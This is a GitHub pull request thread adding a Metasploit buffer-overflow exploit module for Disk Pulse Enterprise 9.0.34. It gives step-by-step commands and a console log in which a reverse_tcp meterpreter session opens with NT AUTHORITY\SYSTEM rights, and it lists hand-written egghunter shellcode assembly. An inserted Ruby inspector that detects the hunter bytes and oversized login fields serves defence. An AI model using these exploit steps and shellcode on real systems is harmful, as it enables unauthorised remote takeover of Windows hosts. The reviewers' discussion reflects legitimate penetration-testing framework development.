
Added Disk Pulse Enterprise Login Buffer Overflow #7502

Merged
merged 2 commits into from Nov 14, 2016

Conversation

@Chiggins (Contributor) commented Oct 28, 2016

Adding a buffer overflow exploit for Disk Pulse Enterprise 9.0.34 for Microsoft Windows. This module is porting a PoC exploit which can be found on the Exploit DB page.

At its current stage, this exploit is fully functional though it has two imperfections:

  • Egghunter is hard-coded, doesn't use generate_egghunter()
  • SEH is hard-coded, doesn't use generate_seh_record()

I spent some time trying to get these to work, but I'm at my wits' end trying to figure it out. After talking with @wvu-r7 on IRC, I figured that since the exploit works I'd go ahead and submit a PR.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/http/disk_pulse_enterprise_bof
  • Set RHOST to the host to exploit
  • Set your payload. For example set payload windows/meterpreter/reverse_tcp
  • Set LHOST to your local address
  • exploit
  • Wait for the egghunter to complete, finding and executing your shellcode
  • Verify payload completes

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.com


       =[ metasploit v4.12.39-dev-9672759                 ]
+ -- --=[ 1597 exploits - 909 auxiliary - 274 post        ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/windows/http/disk_pulse_enterprise_bof 
msf exploit(disk_pulse_enterprise_bof) > set rhost 192.168.1.28
rhost => 192.168.1.28
msf exploit(disk_pulse_enterprise_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(disk_pulse_enterprise_bof) > set lhost 192.168.1.26
lhost => 192.168.1.26
msf exploit(disk_pulse_enterprise_bof) > show options

Module options (exploit/windows/http/disk_pulse_enterprise_bof):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.1.28     yes       The target address
   RPORT    80               yes       The target port
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.26     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Disk Pulse Enterprise 9.0.34


msf exploit(disk_pulse_enterprise_bof) > exploit

[*] Started reverse TCP handler on 192.168.1.26:4444 
[*] Generating exploit...
[*] Total exploit size: 21383
[*] Triggering the exploit now...
[*] Please be patient, the egghunter may take a while...
[*] Sending stage (957999 bytes) to 192.168.1.28
[*] Meterpreter session 1 opened (192.168.1.26:4444 -> 192.168.1.28:49163) at 2016-10-27 21:45:52 -0500

meterpreter > sysinfo 
Computer        : WIN7X86
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

@wchen-r7 (Contributor)

Just out of curiosity, what's wrong with generate_egghunter? Is it broken?

@Chiggins (Contributor, Author)

Not exactly sure. If I use that, then my exploit never works, shellcode is
never triggered and the stage isn't sent. I was definitely able to see hex
when debugging with pry, but never got anything to work with it.

@wwebb-r7 (Contributor) commented Nov 3, 2016

I've had problems with generate_egghunter in the past as well and had to write my own routines. Only thing I'd change would be either including the source for each stub in comments, or assembling them with Metasm doing something like:

# Assemble the stub from its source at load time so the bytes are never a mystery blob
egg_stub = Metasm::Shellcode.assemble(Metasm::Ia32.new(32), <<FIN).encode_string
xor eax, eax
add ecx, eax
xor ecx, ecx
FIN

It becomes a problem if somewhere down the line either our customers or we try to debug some issue with it, even if it's a simple egghunter. I know there's a lot of old code in framework that includes mystery binary blobs, but there has never been a better time to learn from bad decisions.

@Chiggins (Contributor, Author) commented Nov 3, 2016

@wwebb-r7 I took your suggestion and with a little bit of modification added the following code:

egghunter_asm = %Q|
      or    dx, 0xfff
      inc   edx
      push  edx
      push  0x2
      pop   eax
      int   0x2e
      cmp   al, 0x5
      pop   edx
      je    0x0
      mov   eax, 0x74303077
      mov   edi, edx
      scas  eax, dword ptr es:[edi]
      jne   0x5
      scas  eax, dword ptr es:[edi]
      jne   0x5
      jmp   edi
    |
egg_stub = Metasm::Shellcode.assemble(Metasm::Ia32.new(32), egghunter_asm).encode_string

But after reloading and trying to exploit, I get a message that Exploit failed: Metasm::ParseError invalid opcode near "scas" at "\"<unk>\"" line 13. Does Metasm not support scas? Even using metasm_shell.rb I get the same error. The hex for that line should be \xaf if that is any bit of useful information.
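
The egghunter listed above has two fixed byte patterns that a defender can look for in login traffic to a Disk Pulse web interface: the opening or/inc/push/push/pop/int 0x2e stub, and the egg "w00t" (the little-endian bytes of 0x74303077), which the two scasd instructions require back to back. The following Ruby inspector is an added example, not code from the module, from Metasploit, or from this PR; the constructed sample requests, the /login path and host name, the 1024-byte field threshold and the inspect_request function are all assumptions made for the demonstration.

```ruby
# Added example, not part of the Disk Pulse module or of this PR: a small
# request inspector that flags the int 0x2e egghunter listed in the thread
# when it appears in an HTTP request, plus the oversized form field that
# this class of login overflow needs. All sample requests are constructed.

# Machine code for the first six instructions of the egghunter in the
# thread: or dx,0xfff / inc edx / push edx / push 2 / pop eax / int 0x2e.
EGGHUNTER_PREFIX = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E".b.freeze

# mov eax, 0x74303077 loads the egg "w00t" (little-endian), and the two
# scasd instructions require it to appear twice back to back.
EGG_TAG    = "w00t".b.freeze
DOUBLE_EGG = (EGG_TAG * 2).freeze

# Field length above which a login form value is treated as suspicious
# (assumed threshold; the thread does not state the real overflow length).
MAX_FIELD_LEN = 1024

# Everything after the first blank line of a raw HTTP request.
def request_body(raw)
  raw.b.split("\r\n\r\n", 2)[1].to_s
end

# Return the sorted list of findings for one raw HTTP request (String).
def inspect_request(raw)
  raw  = raw.b
  body = request_body(raw)
  findings = []
  findings << :egghunter_stub if raw.include?(EGGHUNTER_PREFIX)
  findings << :double_egg_tag if raw.include?(DOUBLE_EGG)
  # Form-encoded login fields: flag any single value past the threshold.
  body.split("&").each do |pair|
    _name, value = pair.split("=", 2)
    findings << :oversized_field if value && value.bytesize > MAX_FIELD_LEN
  end
  findings.uniq.sort
end

# Assumed request line and headers for the samples below.
HEADERS = "POST /login HTTP/1.1\r\nHost: diskpulse.example\r\n" \
          "Content-Type: application/x-www-form-urlencoded\r\n\r\n"

# Constructed benign login.
SAMPLE_BENIGN = (HEADERS + "username=alice&password=s3cret").b

# Constructed request in the shape the thread describes: one long field
# carrying the hunter stub, then the doubled egg and filler standing in
# for the payload that the hunter would normally locate.
SAMPLE_SUSPICIOUS = (HEADERS + "username=" + ("A" * 2000) +
                     EGGHUNTER_PREFIX + ("\x90".b * 16) +
                     DOUBLE_EGG + ("B" * 64) + "&password=x").b

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_BENIGN, SAMPLE_SUSPICIOUS].each do |req|
    puts "#{req.bytesize} bytes -> #{inspect_request(req).inspect}"
  end
end
```

The opcode bytes are taken from the instruction listing in the comment above, so the stub match only fires when the hunter is sent unencoded, as the hard-coded version in this module does; the field-length check is the more durable signal, since it does not depend on how the hunter or payload is encoded. A real deployment would also URL-decode the body before matching.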

@wwebb-r7 (Contributor) commented Nov 4, 2016

@Chiggins it wouldn't surprise me to find out that it doesn't support it. I'll take a look myself when I get a chance.

@wwebb-r7 wwebb-r7 self-assigned this Nov 8, 2016
@wwebb-r7 (Contributor)

Works. Aside from the spaces at EOL that are causing the build to fail, and the code in comments issue we discussed, it's ready to land.

@Chiggins (Contributor, Author)

Got those all cleaned up and building. Let me know what else I could do.

@wwebb-r7 wwebb-r7 merged commit 4e98027 into rapid7:master Nov 14, 2016
@wwebb-r7 (Contributor)

Thanks. Merged.

@wwebb-r7 (Contributor)

Release Notes

This update adds an exploit module for a stack-based buffer overflow vulnerability in Disk Pulse Enterprise 9.0.34 which grants SYSTEM privileges to the user.

@tdoan-r7 tdoan-r7 added the rn-enhancement release notes enhancement label Nov 28, 2016